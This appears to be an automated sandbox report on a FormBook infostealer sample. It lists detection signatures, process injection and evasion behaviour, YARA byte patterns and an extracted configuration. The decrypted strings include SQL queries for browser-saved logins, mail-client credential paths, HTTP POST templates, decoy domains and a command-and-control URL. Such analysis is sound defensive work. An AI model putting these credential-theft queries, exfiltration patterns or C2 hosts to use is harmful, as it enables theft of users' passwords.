Play interactive tour

Edit tour

Analysis Report JdtN8nIcLi8RQOi.exe

Overview

General Information

Sample Name:	JdtN8nIcLi8RQOi.exe
Analysis ID:	339360
MD5:	aee550440966b0bd34d9ccb2b1f7f146
SHA1:	14125d61fbcf4b63cb9c9ad82a60be3ad9aa2a3d
SHA256:	d31340f14a66b43a1f5cf461cf48278bb97bfc33ef5a8bd0b29d0a3e6f315895
Tags:	exeFormbookOutlook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

JdtN8nIcLi8RQOi.exe (PID: 6596 cmdline: 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe' MD5: AEE550440966B0BD34D9CCB2B1F7F146)

JdtN8nIcLi8RQOi.exe (PID: 5756 cmdline: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe MD5: AEE550440966B0BD34D9CCB2B1F7F146)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

WWAHost.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)

cmd.exe (PID: 4832 cmdline: /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79dc", "KEY1_OFFSET 0x1bb1e", "CONFIG SIZE : 0xb5", "CONFIG OFFSET 0x1bc1e", "URL SIZE : 22", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xc41a2362", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715032", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012162", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd013cd", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "philippebrooksdesign.com", "cmoorestudio.com", "profille-sarina23tammara.club", "dqulxe.com", "uiffinger.com", "nolarapper.com", "maconanimalexterminator.com", "bisovka.com", "loveisloveent.com", "datication.com", "spxo66.com", "drhelpnow.com", "ladybug-cle.com", "macocome.com", "thepoppysocks.com", "eldritchparadox.com", "mercadolibre.company", "ismartfarm.com", "kansascarlot.com", "kevinld.com", "p87mbu2ss.xyz", "the-makery.info", "untegoro.site", "newyorkcityhemorrhoidcenter.com", "crystalclearwholistics.com", "iregentos.info", "fullskis.com", "promanconsortium.com", "800029120.com", "mummyisme.com", "humpychocks.com", "myfavestuff.store", "naturalfemina.com", "bimetalthermostatksd.com", "draysehaniminciftligi.com", "sf9820.com", "4thop.com", "24les.com", "thepupcrew.com", "strangephobias.com", "hotmamabody.com", "restaurantsilhouette.com", "texasadultdayservices.com", "binahaiat.com", "nipseythegreat.com", "pelisplusxd.net", "mamborio.com", "elitedigitalperformance.com", "therileyretreat.com", "aieqbgk.icu", "corkboardit.net", "katieberiont.com", "telemedicinehamilton.com", "imagistor.com", "tekdesignltd.com", "bmw-7979.com", "animaliaartist.com", "straightlineautoserviceerie.net", "qoo10online.com", "tesseracoffee.com", "central-car-sales.com", "thecleaningenthusiast.com", "musicmercch.com", "pearlpham.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.allismd.com/ur06/\u0000"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2f8ba0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2f8f2a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x31fdc0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x32014a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x304c3d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x32be5d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x304729:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x32b949:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x304d3f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x32bf5f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x304eb7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x32c0d7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2f9942:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x320b62:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3039a4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x32abc4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x2fa6ba:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x3218da:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x309d2f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x330f4f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x30add2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x306c61:$sqlite3step: 68 34 1C 7B E1 0x306d74:$sqlite3step: 68 34 1C 7B E1 0x32de81:$sqlite3step: 68 34 1C 7B E1 0x32df94:$sqlite3step: 68 34 1C 7B E1 0x306c90:$sqlite3text: 68 38 2A 90 C5 0x306db5:$sqlite3text: 68 38 2A 90 C5 0x32deb0:$sqlite3text: 68 38 2A 90 C5 0x32dfd5:$sqlite3text: 68 38 2A 90 C5 0x306ca3:$sqlite3blob: 68 53 D8 7F 8C 0x306dcb:$sqlite3blob: 68 53 D8 7F 8C 0x32dec3:$sqlite3blob: 68 53 D8 7F 8C 0x32dfeb:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: JdtN8nIcLi8RQOi.exe PID: 6596	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79dc", "KEY1_OFFSET 0x1bb1e", "CONFIG SIZE : 0xb5", "CONFIG OFFSET 0x1bc1e", "URL SIZE : 22", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xc41a2362", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715032", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012162", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd013cd", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------

Multi AV Scanner detection for submitted file

Show sources

Source: JdtN8nIcLi8RQOi.exe

ReversingLabs: Detection: 21%

Yara detected FormBook

Show sources

